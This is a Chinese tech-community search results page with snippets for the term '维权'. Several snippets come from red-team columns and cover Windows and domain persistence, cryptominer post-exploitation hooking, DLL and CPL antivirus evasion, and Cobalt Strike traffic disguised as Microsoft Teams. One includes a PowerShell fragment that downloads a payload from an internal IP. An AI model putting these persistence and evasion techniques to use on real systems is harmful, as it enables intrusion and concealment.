- 综合排序
- 最热优先
- 最新优先
- 来自专栏网络安全攻防
Windows维权之粘滞键项维权
TargetBinary sethc.exe(Empire: powershell/lateral_movement/invoke_wmi_debugger) > set ComputerName WIN7-
1.2K10编辑于 2023-11-30 - 来自专栏安恒网络空间安全讲武堂
从挖矿木马看后渗透维权
阶段7 清理入侵痕迹。 ? 阶段8 劫持系统进程以及命令(比如ls,cd等常用命令,后期还会劫持sshd)。 编译libcryptod.c为/usr/local/lib/libcryptod.so 5.预加载动态链接库,恶意hook关键系统操作函数 6.修改/etc/cron.d/root文件,增加定时任务 7.
2.7K30发布于 2019-10-16 - 来自专栏黑白天安全团队
分享一个维权手法
payload function Add-Persistence() { #payload的路径 $payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2 " #保存维权马的路径 $tmpdir = $env:APPDATA; #vbs路径 $payloadvbsloaderpath = "$tmpdir\_log.vbs" #下载payload
57940编辑于 2021-12-29 - 来自专栏内网安全学习笔记
利用机器账户进行域维权
前言 机器账户在许多技术中可以用于提权或横向移动,如使用机器账户的委派进行dcsync,使用机器账户也可进行维权操作。 除了上述作用,使用机器账户也可进行域维权操作。 下面我们从ADSI编辑器中进行修改,改为8192 PowerMad+Active Directory组合: 添加机器账户 我们在进行维权时,可以从利用工具从命令行创建机器账户。 除去域用户之外,域内机器账户也可以添加到高权限用户组中用以维权。 可加入Enterprise Admins、Administrators、Domain Admins等高权限组内用以维权。
1.1K10编辑于 2023-04-17 - 来自专栏腾讯云 DNSPod 团队
网络著作侵权成风,维权之路何去何从?
而另一方面,由于网络环境的复杂关系,使得网络作品侵权问题屡见不鲜,著作权人维权之路道阻且长。 为了保护著作权人的合法权益,可以采用以下手段进行维权。 一、和解:如若当事人有自行解决的意向,可以协商处理纠纷问题。 二、调解:当事人可以委托第三方(版权保护协会、律师事务所以及个人等)调解纠纷。
3.7K20发布于 2020-10-09 - 来自专栏红队蓝军
巧用cpl文件维权和免杀
cpl文件的应用 bypass Windows AppLocker 什么是Windows AppLocker: AppLocker即“应用程序控制策略”,是Windows 7系统中新增加的一项安全功能 在win7以上的系统中默认都集成了该功能。 经过一系列处理后,找杀毒能力还比较强的360试一下 参考 https://wooyun.js.org/drops/CPL%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8%E4% BB%8B%E7%BB%8D.html https://attack.mitre.org/techniques/T1218/002/ https://docs.microsoft.com/zh-cn/windows
58440编辑于 2022-05-18 - 来自专栏安全学习记录
红队技术-上线木马自动维权
在攻防中,上线机器总是需要手动进行维权,太过于麻烦,何不直接上线即维权呢,直接放核心代码,当做个记录 https://github.com/capnspacehook/taskmaster package = nil { return } runWinTask(path) } 管理员权限下自动维权,分为自身维权和迁移路径维权版本,已集合至千机免杀一键生成
32130编辑于 2023-11-16 - 来自专栏红队蓝军
巧用cpl文件维权和免杀
cpl文件的应用 bypass Windows AppLocker 什么是Windows AppLocker: AppLocker即“应用程序控制策略”,是Windows 7系统中新增加的一项安全功能。 在win7以上的系统中默认都集成了该功能。 经过一系列处理后,找杀毒能力还比较强的360试一下 参考 https://wooyun.js.org/drops/CPL%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8%E4% BB%8B%E7%BB%8D.html https://attack.mitre.org/techniques/T1218/002/ https://docs.microsoft.com/zh-cn/windows
61740编辑于 2022-05-17 - 来自专栏开源部署
CentOS 7 利用Apache搭建Web网站服务
Windows搭建Web服务可以参考博文:Windows Server 2016 搭建IIS(web)服务 如果想要在CentOS 7 利用Apache搭建网站服务,必须要了解的知识点有: Apache ASF的官方网站是http://www.apache.org Apache的主要特点: 开放源代码; 跨平台应用; 支持各种Web编程语言; 模块化设计; 运行非常稳定; 良好的安全性。 安装httpd服务器 在配置Apache网站服务之前,需要正确安装好httpd服务器软件。httpd服务器的安装可以选用RPM安装、源码编译安装这两种方式。 利用Apache搭建Web网站服务/ 下载方法见 http://www.linuxidc.com/Linux/2013-07/87684.htm ---------------------------- ::* LISTEN 59183/httpd 二、部署网页文档 httpd服务器已提供了一个名为index.html的测试网页,做为访问网站的默认首页
2K20编辑于 2022-07-28 - 来自专栏小狐狸说事
7b2主题网站夜间模式
7b2主题网站夜间模式 ---- 网站footer.php引入css文件 js: (function(){ if(document.cookie.replace(/(?:(?:^|. 任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
78510编辑于 2022-11-17 - 来自专栏腾讯云 DNSPod 团队
是维权还是“违权”?
// 继“逍遥镇胡辣汤”大批商家因商标侵权相继摘牌后,又一大家熟知的地方特产“荔浦芋”再掀维权风波。 荔浦芋顾名思义,因其产自于广西桂林地区的荔浦县而得名。 那荔浦这次的维权是否会得到法律的支持呢? 根据《中华人民共和国商标法》第三条规定:经商标局核准注册的商标为注册商标,包括商品商标、服务商标和集体商标、证明商标;商标注册人享有商标专用权,受法律保护。 此案法院审理结果还未可知,我们能做的是加强法律意识和自身的商标品牌保护意识,既要维权又要告诉自己不要“违权”。 现在上腾讯注册商标,价格低至320元,点击左下角“阅读原文”,即可解锁~
58620编辑于 2022-09-27 - 来自专栏黑白天安全团队
利用 Microsoft Teams 维权并掩盖 Cobalt Strike 流量
在这种情况下,下一步是在目标中进行绕过EDR维权并在系统中持续进行攻击。 在探索了几个方法后,我们决定使用DLL劫持来进行绕过EDR来维权,经过分析,一个Microsoft Teams二进制文件被确定为容易受到DLL Hijacking 的攻击。 本文解析了维权和C&C的流量如何绕过EDR,一是利用DLL劫持进行维权,然后详细介绍了在使用 Cobalt Strike C2 配置文件与 C&C 通信时如何模拟合法的 Microsoft Teams x49\x46\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00\xFF\xDB\x00\x43\x00"; append "\xF9\x7C \xF3\x4E\x3F\xEC\x7F\x82\x8C\xA4\xB5\x5B\x3E\x64\x11\xE7\xEA\x78\x70\xCD\x6B\xFE\x0E\x1F\xFF\xD9";
1.6K20发布于 2021-10-18 - 来自专栏黑白天安全团队
DLL代理加载shellcod用于免杀,维权等等
根据我们的战术我们要如何绕过Defense 这里分享一个我的方法: 我的典型方法是前往Ninite这样的网站,从常见的软件供应商那里下载一些应用程序,然后开始在安装目录中四处浏览。 -7.dll文件,然后重试! 用法很不言自明(你懂的 绕过一下杀毒什么的) 我们把 libnettle-7.dll使用SharpDllProxy输出一个“ / output_libnettle-7”的新文件夹。 ? -7.dll的副本” ”(刚刚重命名)。 现在,我们只需要编译保存到“ D:\ SharpDllProxy \ output_libnettle-7 \ libnettle-7_pragma.c”中的源代码。 ?
3.3K10发布于 2020-11-03 - 来自专栏数据猿
锤子员工被变相强制离职,他们要找罗永浩维权
“所以这基本上等于强制离职,大部分人都没办法签了,但也有一部分人打算维权”。 ? 他也迫于无奈选择了转签合同,当天就办理了入职字节跳动,工作地点不变。 以下为该员工自述节选(略有编辑): 遭遇变相强制离职 有员工打算维权 ? 也听说有些人打算维权,但如果签了就没什么好维权的了,毕竟从协议看是主动离职。 TNT加速了锤子科技倒下 ?
65420发布于 2019-05-06 - 来自专栏Metaverse元宇宙
“元宇宙”维权第一股!中青宝投资者维权征集已开启 投资者可索赔
从1月18日至今中青宝股价累计跌幅达35%,据维权律师分析,该案已经具备维权条件,符合日期要求的投资者均可报名向上市公司索赔。 孔聪律师认为报名维权的条件为:在2022年1月11日到2022年1月18日之间曾买入中青宝300052股票,且在2022年1月18日收盘仍有持股的用户可报名参与此次维权。
44440编辑于 2022-04-28 - 来自专栏IT技术分享社区
网站资源:分享7个实用好玩的在线网站,值得收藏!
今天给大家分享7个非常实用的科技网站,感兴趣的朋友可以尝试一下。 网址:https://www.gaituya.com/ps/ 2、VisuWords 在线英语学习网站 这是一款很棒的的在线交互式英语单词学习网站,非常适合学习英语比较困难的朋友。 网址:https://www.blobmaker.app/ 6、FUUN.FUN 一个有趣的网站 FUUN.FUN从名字就可以看出来就是一个专门搜罗有趣好玩内容的网站,收藏这一个在线网站等同于拥有了一大堆有趣好玩的网站 网站里面的内容都是和世界、历史、小游戏、创意、沙雕、程序员有关幽默素材。如果你工作学习累了,想偷个懒的话,可以来这个网站放松一下。 网址:https://fuun.fun/ 7、文叔叔 在线文件传输神器 这是一款可以将任意文件,快速、安全传给你朋友的超实用工具,即使不注册账号也能快速跟朋友分享文件;并且发送、下载文件不限速,注册登录后有
3.1K30编辑于 2022-02-17 - 来自专栏服务器安全专线
Centos7的apache网站环境搭建wordpress
本篇文章给大家详细分析了在Centos7的apache网站环境搭建wordpress的详细操作方法,有兴趣的朋友参考下。 public --add-port=80/tcp --permanent firewall-cmd --reload //更新防火墙规则 ftp上传wordpress文件 ftp的搭建教程://www.iis7. 然后把内容复制到里面 touch /var/www/html/wp-config.php vim /var/www/html/wp-config.php 全部内容都复制进去,保存退出,点击提交,开始设置网站标题和后台用户名和密码 ,不再赘述 设置网站权限 chown -R apache:apache/var/www/html/ //不更改权限会导致主题和插件安装不了 chown root:root /var/www/html/wp-config.php post_max_size = 8M,修改为post_max_size = 20M 找到max_execution_time=30,修改为max_execution_time=0,这里的0表示没有时间限制 删除网站根目录下的
1.8K50发布于 2019-05-10 - 来自专栏开源部署
CentOS 7下搭建百万PV网站架构详述
日均百万PV的网站站,费用也不低,并且CDN节点有时会出问题,还 需要每次的更改后刷新CDN,不太方便。 PV(Page View,页面浏览量)即点击量,通常意义上说PV的多少是衡量一个网络新闻频道或网站甚至一条网络新闻的主要指标。 pv的解释是这样的:一个访问者在24小时(0点-23点)内到底看了网站的几个页面。需要注意的是:同一个人浏览网站的同一个页面,不重复计算pv量,点击100次页只算1次。 拓扑图如下: 实验环境如下: 具体部署如下: 一 在前面两台主从服务器上安装nginx和keepalived rpm -ivh http://nginx.org/packages/CentOS/7/ noarch/RPMS/nginx-release-centos-7-0.el7.ngx.noarch.rpm # 装带有nginx rpm软件包的源,主从都要做 yum install nginx keepalived
90420编辑于 2022-07-24 - 来自专栏DT数据侠
从11万条消费维权数据中,我们发现了什么?
对工商部门而言,每一年都会积累大量来自消费者的投诉维权数据。如何才能更有效地对这些数据进行分析处理、进而更好地服务于消费者呢? 12月6日的线上数据侠实验室·SODA专场中,2017年上海开放数据创新应用大赛(SODA)优秀奖团队——“数决科技与数说故事”的队长陈瑶副教授,为我们分享了基于消费维权大数据的创新应用。 ▍用数据分析来辅助工商部门搞定“痛点” 在生活中,如果大家有过消费维权经历,应该知道可以拨打12315或者12345市民热线向工商局进行举报。 而对工商部门来说,维权、投诉这块累积的数据量还是挺大的。 仅以上海市为例,工商部门2016年承办的12315投诉总量就有11.2万条,且每年以30%速度增长。 (图片说明:数决科技团队“消费维权大数据智能管理平台”新业务流程图) 文本数据可视化只是为了数据的展示,帮助我们了解现状是什么、问题在哪里?
67400发布于 2018-08-08 - 来自专栏开源部署
CentOS 7安装部署Apache网站后配置详解
在一台CentOS 7上搭建Apache网站后,一般都是允许所有人访问的,那么可能会有一些特殊情况,需要对访问网站的人进行限制,出于这种情况,Apache可以通过Require配置项,来对客户端进行一些访问限制 #省略部分内容 Require ip 192.168.1.2 #仅允许192.168.1.2的主机访问网站服务 </Directory> OK了,现在只有上面这个1.2的ip 地址可以访问该网站了。 那么,现在换一个策略,禁止192.168.1.0网段的主机不能访问网站,但是别的网段的主机都可访问,策略如下: <Directory "/usr/local/httpd/htdocs"> ... 这里就写一下基本认证方式吧 1、创建用户认证数据文件: [root@localhost httpd]# cd /usr/local/httpd/ #切换至网站安装根目录
1.4K10编辑于 2022-07-26
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号